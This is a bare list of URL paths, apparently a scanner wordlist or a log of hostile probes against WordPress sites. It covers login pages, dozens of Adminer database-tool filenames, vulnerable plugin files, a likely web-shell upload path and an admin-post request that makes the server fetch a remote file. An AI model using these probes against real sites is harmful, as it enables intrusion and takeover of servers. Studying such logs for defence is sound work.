wp-login.php
/temp/
/web/
/portal/
/dev/
/cms/
/tmp/
/home/
/demo/
/backup/
/site/
/main/
/test/
/old/
/new/
/blog/
/wpdemos.php
/wp-admin/admin-post.php?testingfsoc=1&url=[url of pastebin raw file redacted]&filename=wpdemos
/wp-content/plugins/blnmrpb/log.txt
/wp-content/plugins/wp-central/readme.txt
/wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css
/wp-content/plugins/batchmove/js/batch.js
/wp-content/plugins/accessally/resource/backend/css/accessally-manage.css
/wp-content/plugins/strong-testimonials/templates/modern/content.css
/wpdemos.php
/wp-content/plugins/wp-central/readme.txt
/old/wp-login.php
//old/wp-login.php
/blog/wp-login.php
/wordpress/wp-login.php
/2019/wp-login.php
/temp/
/wp/wp-login.php
/test/wp-login.php
/wp-content/plugins/formcraft/file-upload/server/php/files/199877.php
/wp-content/plugins/formcraft/file-upload/server/php/
/wp.php
/wp-content/uploads/adminer.php
/wp-content/plugins/adminer/inc/editor/index.php
/wp-content/adminer.php
/pma.php
/mysql.php
/db.php
/connect.php
/adminer
/adminer.php
/adminer-4.7.3.php
/adminer-4.7.3-en.php
/adminer-4.7.3-cs.php
/adminer-4.7.3-mysql.php
/adminer-4.7.3-mysql-en.php
/adminer-4.7.3-mysql-cs.php
/adminer-4.7.2.php
/adminer-4.7.2-mysql.php
/adminer-4.7.2-mysql-en.php
/adminer-4.7.2-mysql-cs.php
/adminer-4.7.2-en.php
/adminer-4.7.2-cs.php
/adminer-4.7.1-mysql.php
/adminer-4.7.1-mysql-en.php
/adminer-4.7.1-mysql-cs.php
/adminer-4.7.1-cs.php
/adminer-4.7.1-en.php
/adminer-4.7.1.php
/adminer-4.7.0-mysql.php
/adminer-4.7.0-mysql-en.php
/adminer-4.7.0-mysql-cs.php
/adminer-4.7.0-mysql-cs.php
/adminer-4.7.0-en.php
/adminer-4.7.0-cs.php
/adminer-4.7.0.php
/adminer-4.6.3.php
/adminer-4.6.3-mysql.php
/adminer-4.6.3-en.php
/adminer-4.6.3-cs.php
/adminer-4.6.3-mysql-cs.php
/adminer-4.6.3-mysql-en.php
/adminer-4.6.2-mysql-en.php
/adminer-4.6.2-mysql-cs.php
/adminer-4.6.2-mysql.php
/adminer-4.6.2.php
/adminer-4.6.2-cs.php
/adminer-4.6.2-en.php
/adminer-4.6.1-mysql-en.php
/adminer-4.6.1-mysql-cs.php
/adminer-4.6.1-mysql.php
/adminer-4.6.1.php
/adminer-4.6.1-cs.php
/adminer-4.6.1-en.php
/adminer-4.6.0-mysql-en.php
/adminer-4.6.0-mysql-cs.php
/adminer-4.6.0-mysql.php
/adminer-4.6.0.php
/adminer-4.6.0-cs.php
/adminer-4.6.0-en.php
/adminer-4.5.0-mysql-en.php
/adminer-4.5.0-mysql-cs.php
/adminer-4.5.0-mysql.php
/adminer-4.5.0.php
/adminer-4.5.0-cs.php
/adminer-4.5.0-en.php
/adminer-4.4.0-mysql-en.php
/adminer-4.4.0-mysql-cs.php
/adminer-4.4.0-mysql.php
/adminer-4.4.0.php
/adminer-4.4.0-cs.php
/adminer-4.4.0-en.php
/adminer-4.3.1-mysql-en.php
/adminer-4.3.1-mysql-cs.php
/adminer-4.3.1-mysql.php
/adminer-4.3.1.php
/adminer-4.3.1-cs.php
/adminer-4.3.1-en.php
/adminer-4.3.0-mysql-en.php
/adminer-4.3.0-mysql-cs.php
/adminer-4.3.0-mysql.php
/adminer-4.3.0.php
/adminer-4.3.0-cs.php
/adminer-4.3.0-en.php
/adminer-4.2.5-mysql-en.php
/adminer-4.2.5-mysql-cs.php
/adminer-4.2.5-mysql.php
/adminer-4.2.5.php
/adminer-4.2.5-cs.php
/adminer-4.2.5-en.php
/adminer-4.2.4-mysql-en.php
/adminer-4.2.4-mysql-cs.php
/adminer-4.2.4-mysql.php
/adminer-4.2.4.php
/adminer-4.2.4-cs.php
/adminer-4.2.4-en.php
/adminer-4.2.3-mysql-en.php
/adminer-4.2.3-mysql-cs.php
/adminer-4.2.3-mysql.php
/adminer-4.2.3.php
/adminer-4.2.3-cs.php
/adminer-4.2.3-en.php
/adminer-4.2.2-mysql-en.php
/adminer-4.2.2-mysql-cs.php
/adminer-4.2.2-mysql.php
/adminer-4.2.2.php
/adminer-4.2.2-cs.php
/adminer-4.2.2-en.php
/adminer-4.2.1-mysql-en.php
/adminer-4.2.1-mysql-cs.php
/adminer-4.2.1-mysql.php
/adminer-4.2.1.php
/adminer-4.2.1-cs.php
/adminer-4.2.1-en.php
/adminer-4.2.0-mysql-en.php
/adminer-4.2.0-mysql-cs.php
/adminer-4.2.0-mysql.php
/adminer-4.2.0.php
/adminer-4.2.0-cs.php
/adminer-4.2.0-en.php
/adminer-4.1.0-mysql-en.php
/adminer-4.1.0-mysql-cs.php
/adminer-4.1.0-mysql.php
/adminer-4.1.0.php
/adminer-4.1.0-cs.php
/adminer-4.1.0-en.php
/adminer-4.0.3-mysql-en.php
/adminer-4.0.3-mysql-cs.php
/adminer-4.0.3-mysql.php
/adminer-4.0.3.php
/adminer-4.0.3-cs.php
/adminer-4.0.3-en.php
/adminer-4.0.2-mysql-en.php
/adminer-4.0.2-mysql-cs.php
/adminer-4.0.2-mysql.php
/adminer-4.0.2.php
/adminer-4.0.2-cs.php
/adminer-4.0.2-en.php
/adminer-4.0.1-mysql-en.php
/adminer-4.0.1-mysql-cs.php
/adminer-4.0.1-mysql.php
/adminer-4.0.1.php
/adminer-4.0.1-cs.php
/adminer-4.0.1-en.php
/adminer-4.0.0-mysql-en.php
/adminer-4.0.0-mysql-cs.php
/adminer-4.0.0-mysql.php
/adminer-4.0.0.php
/adminer-4.0.0-cs.php
/adminer-4.0.0-en.php
/adminer-3.7.1-mysql-en.php
/adminer-3.7.1-mysql-cs.php
/adminer-3.7.1-mysql.php
/adminer-3.7.1.php
/adminer-3.7.1-cs.php
/adminer-3.7.1-en.php
/adminer-3.7.0-mysql-en.php
/adminer-3.7.0-mysql-cs.php
/adminer-3.7.0-mysql.php
/adminer-3.7.0.php
/adminer-3.7.0-cs.php
/adminer-3.7.0-en.php
/adminer-3.6.4-mysql-en.php
/adminer-3.6.4-mysql-cs.php
/adminer-3.6.4-mysql.php
/adminer-3.6.4.php
/adminer-3.6.4-cs.php
/adminer-3.6.4-en.php
/adminer-3.6.3-mysql-en.php
/adminer-3.6.3-mysql-cs.php
/adminer-3.6.3-mysql.php
/adminer-3.6.3.php
/adminer-3.6.3-cs.php
/adminer-3.6.3-en.php
/adminer-3.6.2-mysql-en.php
/adminer-3.6.2-mysql-cs.php
/adminer-3.6.2-mysql.php
/adminer-3.6.2.php
/adminer-3.6.2-cs.php
/adminer-3.6.2-en.php
/adminer-3.6.1-mysql-en.php
/adminer-3.6.1-mysql-cs.php
/adminer-3.6.1-mysql.php
/adminer-3.6.1.php
/adminer-3.6.1-cs.php
/adminer-3.6.1-en.php
/adminer-3.6.0-mysql-en.php
/adminer-3.6.0-mysql-cs.php
/adminer-3.6.0-mysql.php
/adminer-3.6.0.php
/adminer-3.6.0-cs.php
/adminer-3.6.0-en.php
/adminer-3.5.1-mysql-en.php
/adminer-3.5.1-mysql-cs.php
/adminer-3.5.1-mysql.php
/adminer-3.5.1.php
/adminer-3.5.1-cs.php
/adminer-3.5.1-en.php
/adminer-3.5.0-mysql-en.php
/adminer-3.5.0-mysql-cs.php
/adminer-3.5.0-mysql.php
/adminer-3.5.0.php
/adminer-3.5.0-cs.php
/adminer-3.5.0-en.php
/adminer-3.4.0-mysql-en.php
/adminer-3.4.0-mysql-cs.php
/adminer-3.4.0-mysql.php
/adminer-3.4.0.php
/adminer-3.4.0-cs.php
/adminer-3.4.0-en.php
/adminer-3.3.4-mysql-en.php
/adminer-3.3.4-mysql-cs.php
/adminer-3.3.4-mysql.php
/adminer-3.3.4.php
/adminer-3.3.4-cs.php
/adminer-3.3.4-en.php
/adminer-3.3.3-mysql-en.php
/adminer-3.3.3-mysql-cs.php
/adminer-3.3.3-mysql.php
/adminer-3.3.3.php
/adminer-3.3.3-cs.php
/adminer-3.3.3-en.php
/adminer-3.3.2-mysql-en.php
/adminer-3.3.2-mysql-cs.php
/adminer-3.3.2-mysql.php
/adminer-3.3.2.php
/adminer-3.3.2-cs.php
/adminer-3.3.2-en.php
/adminer-3.3.1-mysql-en.php
/adminer-3.3.1-mysql-cs.php
/adminer-3.3.1-mysql.php
/adminer-3.3.1.php
/adminer-3.3.1-cs.php
/adminer-3.3.1-en.php
/adminer-3.3.0-mysql-en.php
/adminer-3.3.0-mysql-cs.php
/adminer-3.3.0-mysql.php
/adminer-3.3.0.php
/adminer-3.3.0-cs.php
/adminer-3.3.0-en.php
/adminer-3.2.2-mysql-en.php
/adminer-3.2.2-mysql-cs.php
/adminer-3.2.2-mysql.php
/adminer-3.2.2.php
/adminer-3.2.2-cs.php
/adminer-3.2.2-en.php
/adminer-3.2.1-mysql-en.php
/adminer-3.2.1-mysql-cs.php
/adminer-3.2.1-mysql.php
/adminer-3.2.1.php
/adminer-3.2.1-cs.php
/adminer-3.2.1-en.php
/adminer-3.2.0-mysql-en.php
/adminer-3.2.0-mysql-cs.php
/adminer-3.2.0-mysql.php
/adminer-3.2.0.php
/adminer-3.2.0-cs.php
/adminer-3.2.0-en.php
/adminer-3.1.0-mysql-en.php
/adminer-3.1.0-mysql-cs.php
/adminer-3.1.0-mysql.php
/adminer-3.1.0.php
/adminer-3.1.0-cs.php
/adminer-3.1.0-en.php
/adminer-3.0.1-mysql-en.php
/adminer-3.0.1-mysql-cs.php
/adminer-3.0.1-mysql.php
/adminer-3.0.1.php
/adminer-3.0.1-cs.php
/adminer-3.0.1-en.php
/adminer-3.0.0-mysql-en.php
/adminer-3.0.0-mysql-cs.php
/adminer-3.0.0-mysql.php
/adminer-3.0.0.php
/adminer-3.0.0-cs.php
/adminer-3.0.0-en.php
/adm.php
/a.php
/ad.php
/_adminer
/_adminer.php
/foo/wp-login.php?action=register
/wp-login.php?action=register
/wp-json/siteground-optimizer/v1/enable-option
/wp-admin/admin-ajax.php


